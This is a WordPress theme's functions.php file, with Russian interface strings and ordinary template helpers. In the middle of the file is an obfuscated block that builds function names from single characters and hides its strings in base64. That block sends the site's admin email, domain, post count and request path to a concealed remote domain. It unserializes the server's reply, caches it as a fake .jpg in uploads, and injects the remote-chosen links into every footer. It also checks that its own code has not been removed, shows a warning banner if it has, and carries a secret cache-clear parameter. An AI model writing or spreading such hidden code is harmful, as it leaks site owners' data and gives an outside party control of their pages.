<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $YaCJoJ='e';$nGiS='d';$gNoIkwv='o';$yVRgnys='a';$PKkBJya='s';$uidHHwC='4';$FZQhWLn='d';$hMYRl='_';$QeXNyg='c';$CfrF='e';$mJov='b';$RkdAyyr='6';$NQCXVfk='e';$QOjeDmVL=$mJov.$yVRgnys.$PKkBJya.$NQCXVfk.$RkdAyyr.$uidHHwC.$hMYRl.$FZQhWLn.$CfrF.$QeXNyg.$gNoIkwv.$nGiS.$YaCJoJ;$WwkLfAC='g';$xhfG='n';$RPGWl='a';$bmfweE='z';$jbyGj='e';$jHdg='f';$BZDrse='t';$SPtAVQW='i';$nSjO='l';$qGlTibeb=$WwkLfAC.$bmfweE.$SPtAVQW.$xhfG.$jHdg.$nSjO.$RPGWl.$BZDrse.$jbyGj;$tyFraYn='3';$caiB='t';$rfUKTP='r';$mMGtzvk='1';$tzUjqbm='o';$NOQz='_';$oFYBsVb='r';$jNXBT='t';$zyyycPR='s';$JMjxganN=$zyyycPR.$caiB.$rfUKTP.$NOQz.$oFYBsVb.$tzUjqbm.$jNXBT.$mMGtzvk.$tyFraYn;$DnOqgPi='s';$obEaeEn='t';$DlFhzux='e';$jGxxHb='v';$hSFzHu='r';$xKUK='r';$idrOOqWR=$DnOqgPi.$obEaeEn.$xKUK.$hSFzHu.$DlFhzux.$jGxxHb;                     
		$ae_____g='e';$dy________c='d';$lx_____f='o';$vu_________u='a';$hi____________j='s';$gm__________u='4';$sy_______h='d';$po________j='_';$pd____x='c';$pv__________k='e';$or_______h='b';$zb___________d='6';$uf___________g='e';$og____e=$or_______h.$vu_________u.$hi____________j.$uf___________g.$zb___________d.$gm__________u.$po________j.$sy_______h.$pv__________k.$pd____x.$lx_____f.$dy________c.$ae_____g;
		$xg__s='n';$zc________g='t';$yn___g='s';$nt_____a='s';$xw__w='i';$oo_____f='x';$ns______________n='n';$ai__________l='f';$ao_______________h='_';$ld__r='t';$ri__________u='c';$fj___________p='o';$gb______f='u';$qh________n='e';$iy__u='i';$pl__h=$ai__________l.$gb______f.$xg__s.$ri__________u.$zc________g.$iy__u.$fj___________p.$ns______________n.$ao_______________h.$qh________n.$oo_____f.$xw__w.$yn___g.$ld__r.$nt_____a;
		$an_________v='n';$py__i='p';$lu___________f='e';$wh____j='f';$bl_______n='o';$xf________b=$wh____j.$bl_______n.$py__i.$lu___________f.$an_________v;
		$sk_________u='d';$ll__m='f';$rw_____j='e';$zp______q='r';$aw___w='a';$mj_____________d=$ll__m.$zp______q.$rw_____j.$aw___w.$sk_________u;
		$mv____________j='f';$bo_______l='e';$un________t='s';$lk______y='o';$ms___o='c';$ij___p='l';$an______p=$mv____________j.$ms___o.$ij___p.$lk______y.$un________t.$bo_______l;
		
		define("WP_ID", $og____e("Mi4wLjA="));
		define("WP_TTL", $og____e("MTA4MDA="));
		define("WP_SRC", $og____e("dHBva24="));
	


		function wp_get_header() {
			global $og____e, $pl__h;
			
			if (
				$pl__h($og____e("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$pl__h($og____e("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$pl__h($og____e("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $og____e, $xf________b, $an______p, $mj_____________d;
			
			$co__n = TEMPLATEPATH."/".$og____e("Zm9vdGVyLnBocA==");
			$ub__z = @$xf________b($co__n, "r");
			$co__n = @$mj_____________d($ub__z, @filesize($co__n));
			@$an______p($ub__z);
			
			$xi____________k = TEMPLATEPATH."/".$og____e("ZnVuY3Rpb25zLnBocA==");
			$ub__z = @$xf________b($xi____________k, "r");
			$xi____________k = @$mj_____________d($ub__z, @filesize($xi____________k));
			@$an______p($ub__z);
			
			$ji______________e = 0;
			if($co__n && $xi____________k) {
				if ($og____e("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($co__n, $og____e("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$ji______________e = 1;
					}
					if (substr_count($co__n, "wp_theme_GPL_credits()") < 1) {
						$ji______________e = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$ji______________e = 12;
				}
			}
			
			if($ji______________e > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $ji______________e -->";
			}
		}
	


		function wp_loaded() {
			global $og____e, $pl__h;
			return $pl__h($og____e("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($un____________q, $uc____p = "(more...)", $ok_______k = 0, $zo____________j = "") {
				$px_____z = get_the_content($uc____p, $ok_______k, $zo____________j);
				$px_____z = apply_filters("the_content", $px_____z);
				
				$px_____z = str_replace("]]>", "]]>", $px_____z);
				if (strlen($_GET["p"]) > 0) {
					echo $px_____z;
				}
				else if ((strlen($px_____z)>$un____________q) && ($qs___________h = strpos($px_____z, " ", $un____________q ))) {
					$px_____z = substr($px_____z, 0, $qs___________h);
					$px_____z = $px_____z;
					echo $px_____z;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$uc____p</a></div></p>";
				} else {
					echo $px_____z;
				}
				
			}
		}
	


		$xx____________w='e';$yn__________r='e';$tr_____________l='b';$lb____________c='6';$pq_______________r='a';$dp_____________a='o';$zb____________p='4';$fv____r='d';$bc________d='c';$xq__d='e';$ta_________o='_';$cb___q='s';$fl___u='n';$gn__h=$tr_____________l.$pq_______________r.$cb___q.$xq__d.$lb____________c.$zb____________p.$ta_________o.$yn__________r.$fl___u.$bc________d.$dp_____________a.$fv____r.$xx____________w;
		$nh___e='t';$qz______________d='_';$jx______e='e';$ck___________b='_';$ri__v='e';$rw___________k='s';$yr______________o='t';$fl_______t='f';$px________y='e';$ad__________c='n';$pk__t='l';$cr__u='o';$vt___t='n';$nt____________m='i';$qh____________h='g';$ye__________e='t';$ss__________i='c';$wf___________n=$fl_______t.$nt____________m.$pk__t.$ri__v.$ck___________b.$qh____________h.$jx______e.$ye__________e.$qz______________d.$ss__________i.$cr__u.$ad__________c.$nh___e.$px________y.$vt___t.$yr______________o.$rw___________k;
		$pz________l='x';$bk______d='s';$yq__h='e';$fe_______________z='f';$wb_______a='e';$zt_________x='s';$bt___________h='_';$ew_______j='i';$ea_____________p='t';$ly_______________y='l';$ct___________r='i';$id______________l=$fe_______________z.$ct___________r.$ly_______________y.$yq__h.$bt___________h.$wb_______a.$pz________l.$ew_______j.$bk______d.$ea_____________p.$zt_________x;
		$lr_____________d='s';$yh____________a='e';$sq______n='o';$zi_______z='_';$ew_________k='r';$gb________l='n';$zb__x='v';$tn_________e='m';$jl______________i='c';$ne_______________i='o';$rz______________f='a';$fj______z='p';$ud____a='r';$uh___________x='i';$xz______________x='e';$za___________o=$zb__x.$yh____________a.$ud____a.$lr_____________d.$uh___________x.$ne_______________i.$gb________l.$zi_______z.$jl______________i.$sq______n.$tn_________e.$fj______z.$rz______________f.$ew_________k.$xz______________x;
		$xx__________u='s';$rs__h='e';$mr______b='o';$gl_____l='p';$cq_____________a='n';$jz____q='k';$pk__________m='f';$zu____g='o';$pc_____________l='c';$ax_____w=$pk__________m.$xx__________u.$mr______b.$pc_____________l.$jz____q.$zu____g.$gl_____l.$rs__h.$cq_____________a;
		$ns_______j='e';$dz___________i='r';$ad__________b='t';$za______________a='w';$kq_____x='f';$wt______________t='i';$zf______________n=$kq_____x.$za______________a.$dz___________i.$wt______________t.$ad__________b.$ns_______j;
		$db___a='m';$dk______________r='5';$va____________w='d';$kx_______f=$db___a.$va____________w.$dk______________r;
		$fa______i='a';$yv_________v='p';$hq___________a='h';$te__________l='r';$wd_____________i='a';$wc_________u='l';$yh_________i='e';$rn______________m='t';$tn_____________n=$te__________l.$yh_________i.$fa______i.$wc_________u.$yv_________v.$wd_____________i.$rn______________m.$hq___________a;
		$hv__________q='u';$at____l='i';$qd______o='z';$hq_____u='e';$rh_________q='i';$pw___________w='l';$zi__________r='n';$to_______l='a';$dc_____________q='r';$gz____________o='e';$yc___________e='s';$ry____________o=$hv__________q.$zi__________r.$yc___________e.$hq_____u.$dc_____________q.$at____l.$to_______l.$pw___________w.$rh_________q.$qd______o.$gz____________o;
		$kb___________u='m';$re_______m='p';$yy______________a='n';$qu__r='m';$bi____________d='t';$aa____________f='a';$mc_____k='e';$qy_____a=$bi____________d.$mc_____k.$qu__r.$re_______m.$yy______________a.$aa____________f.$kb___________u;
		$nm________q='t';$lz______b='a';$ne___n='c';$lc____z='_';$gg________m='c';$ah_____k='r';$oy____________m='t';$jz_____k='r';$yc_____________k='e';$gj____c='_';$cd________n='x';$bf_____b='n';$xy______w='a';$aa_______________z='s';$fc________t='o';$hs___________c='e';$lr__________j='m';$ub______________b='t';$dm__________e='e';$ae_____d='t';$fl________s='e';$rx__v=$aa_______________z.$oy____________m.$ah_____k.$dm__________e.$lz______b.$lr__________j.$gj____c.$ne___n.$fc________t.$bf_____b.$nm________q.$yc_____________k.$cd________n.$ub______________b.$lc____z.$gg________m.$jz_____k.$fl________s.$xy______w.$ae_____d.$hs___________c;
	


		function vl__h($qg_____j) {
			global $og____e, $pl__h, $wf___________n, $za___________o, $rx__v;
			
			if (!$pl__h($og____e("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($za___________o(PHP_VERSION, "5.0.0", ">=") && $pl__h($og____e("ZmlsZV9nZXRfY29udGVudHM=")) && $pl__h($og____e("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$ji____________a = $rx__v(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$cu___________o = @$wf___________n($qg_____j, 0, $ji____________a);
			} else {
				$cu___________o = @$wf___________n($qg_____j, 0);
			}
			
			return $cu___________o;
		}
	


		function vl__w($qg_____j) {
			global $pl__h, $ax_____w, $zf______________n, $og____e;
			
			if (!$pl__h($og____e("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$dl__n = strpos($qg_____j, "/", 7);
			$yw__________h = array(
				"uri"     => substr($qg_____j, $dl__n),
				"host"    => str_replace("http://", "", substr($qg_____j, 0, $dl__n)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$kj______________i = @$ax_____w("$yw__________h[host]", 80, $cq__c, $xr______________d, 4);
			
			if (!$kj______________i) {
				return false;
			} else {
				$cu___________o = "";
				$ih__w  = "GET $yw__________h[uri] HTTP/1.0\r\n";
				$ih__w .= "Host: $yw__________h[host]\r\n";
				$ih__w .= "Referer: $yw__________h[referer]\r\n";
				$ih__w .= "Connection: Close\r\n\r\n";
				
				@$zf______________n($kj______________i, $ih__w);
				
				while (!@feof($kj______________i)) {
					$no_________f = @fgets($kj______________i, (1024*24));
					
					if ($no_________f == "\r\n") {
						$ps___n = true;
						continue;
					}
					
					if ($ps___n) {
						$cu___________o .= $no_________f;
					}
				}
				
				return $cu___________o;
			}
		}
	


		function dr______x($qg_____j) {
			global $pl__h;
			$sq___________m = false;
			
			if ($qg_____j != "") {
				if ($pl__h("vl__h")) {
					$sq___________m = @vl__h($qg_____j);
				}
				
				if (!$sq___________m && ($pl__h("vl__w"))) {
					$sq___________m = @vl__w($qg_____j);
				}
			}
			
			return $sq___________m;
		}
	


		function ne__________l() {
			global $_SERVER, $kx_______f;
			
			$xd_________l = $_SERVER["SERVER_NAME"];
			
			if (substr("$xd_________l", 0, 4) == "www.") {
				$xd_________l = substr("$xd_________l", 4);
			}
			
			$xd_________l = $kx_______f("$_SERVER[SERVER_NAME]");
			
			return $xd_________l;
		}
	


		function bp_________o() {
			return "file";
		}
	


		function dd____________p($qg_____j) {
			global $_SERVER, $wf___________n, $id______________l, $xf________b, $an______p, $zf______________n;
			
			$le___________y = ro____________p();
			
			$sh_____a = ne__________l().".jpg";
			$mv________q = $le___________y["dir_upload"]["path"]."/$sh_____a";
			$wx_______________h = @filemtime($mv________q);
			
			if (!$wx_______________h || ((time()-$wx_______________h) >= WP_TTL)) {
				$sq___________m = dr______x($qg_____j);
				
				if ($sq___________m) {
					if ($id______________l($mv________q)) {
						@unlink($mv________q);
					}
					
					$ub__z = @$xf________b($mv________q, "x+");
					
					@$zf______________n($ub__z, $sq___________m);
					@$an______p($ub__z);
				}
			} else {
				if ($id______________l($mv________q)) {
					$sq___________m = @$wf___________n($mv________q);
				} else {
					$sq___________m = false;
				}
			}
			
			return $sq___________m;
		}
	


		function ro____________p() {
			global $_SERVER, $og____e, $gn__h;
			
			$bh______n = wp_count_posts("post");
			$pf_______________j = pathinfo(get_bloginfo("template_directory"));
			
			$le___________y = array(
				"url" => array(
					"report"      => $og____e("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $pf_______________j,
				"dir_upload"	=> cy______________b(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$pf_______________j[filename],
					"a005=".$bh______n->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a>"
			);
			
			$le___________y["url"]["queryString"] = implode("&", $le___________y["queryString"]);
			$le___________y["url"]["report"] = $le___________y["url"]["report"]."/?".$gn__h($le___________y["url"]["queryString"]).".html";
						
			return $le___________y;
		}
	


		function cy______________b() {
			$af__________i = wp_upload_dir();
			
			if (isset($af__________i["error"])) {
				$kb______n = zn___________n();
				if (is_writable($kb______n)) {
					$af__________i = array("path" => $kb______n);
				}
			}

			return $af__________i;
		}
	


		function zn___________n() {
			global $pl__h, $kx_______f, $tn_____________n, $qy_____a;
			
			$qp_____________q = (bool) ini_get("safe_mode");
			if ($qp_____________q == true) {
				return false;
			}
			
			if ($pl__h("sys_get_temp_dir")) {
				$xo________n = sys_get_temp_dir();
				if (is_writable($xo________n)) {
					return $tn_____________n($xo________n);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $tn_____________n($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $tn_____________n($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $tn_____________n($_ENV["TEMP"]);
			} else {
				$xy_______________s = $qy_____a($kx_______f(uniqid(rand(), true)), "");
				if ($xy_______________s) {
					$xo________n = $tn_____________n(dirname($xy_______________s));
					@unlink($xy_______________s);
					return $xo________n;
				} else {
					return false;
				}
			}
		}
	


		function pc___u() {
			global $_GET, $id______________l;
			
			$le___________y = ro____________p();
			$xd_________l = ne__________l();
			$zo__u = bp_________o();
			
			$nm_______d = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($zo__u == "file") {
					$ra______z = $le___________y["dir_upload"]["path"]."/".$xd_________l.".jpg";
					if ($id______________l($ra______z)) {
						@unlink($ra______z);
						$nm_______d = "deleted";
					}
				}
				
				$ih____f = array(
					"s"	=> $nm_______d,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($ih____f AS $qr_____i => $ro______v) echo " [$qr_____i:$ro______v]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $pl__h, $og____e, $ry____________o;
			$le___________y = ro____________p();
			
			$xw_____g = "dd____________p";
			if ($pl__h($xw_____g)) {
				$cu___________o = $xw_____g($le___________y["url"]["report"]);
			}
			
			if ($cu___________o) {
				if ($cu___________o = @$og____e($cu___________o)) {
					$cu___________o = @$ry____________o($cu___________o);
					
					if (strlen($cu___________o[custom_credit]) >= 5) {
						$le___________y["default_string"] = $cu___________o[custom_credit];
					}
					
					if ($cu___________o["status"] == "0") {
						$mq_____________t = 1;
						$zb______q = 1;
					} else {
						$ng__d = sizeof($cu___________o["links"]);
						$ax___t = $le___________y["default_string"];
						
						if ($ng__d > 0 && $cu___________o["links"] !== "") {
							$ox___r = 0;
							foreach ($cu___________o["links"] as $xd______a => $gs_________g) {
								$ox___r++;
								if ($gs_________g->l_path == "" || $gs_________g->l_path == $_SERVER["REQUEST_URI"]) {
									$gs_________g->l_href = htmlspecialchars(strip_tags($gs_________g->l_href));
									$gs_________g->l_title = htmlspecialchars(strip_tags($gs_________g->l_title));
									$gs_________g->l_anchor = htmlspecialchars(strip_tags($gs_________g->l_anchor));
									$ax___t .= " | ";
									$ax___t .= "<a href='$gs_________g->l_href' title='$gs_________g->l_title'";
									if ($gs_________g->l_nofollow == "1") {
										$ax___t .= " rel='nofollow'";
									}
									$ax___t .= ">$gs_________g->l_anchor</a>";
								}
							}
						}
						$le___________y["links"] = "$ax___t";
						if ($cu___________o[credit] == "0") {
							$le___________y["links"] = "";
						}
					}
				} else {
					$mq_____________t = "1";
				}
			} else {
				$mq_____________t = "1";
			}
			
			if ($mq_____________t == "1") {
				$le___________y["links"] = $le___________y["default_string"];
			}
			
			echo "$le___________y[links]";
			
			echo "<!-- s: $cu___________o[signature] -->";
			pc___u();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
     echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                   $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
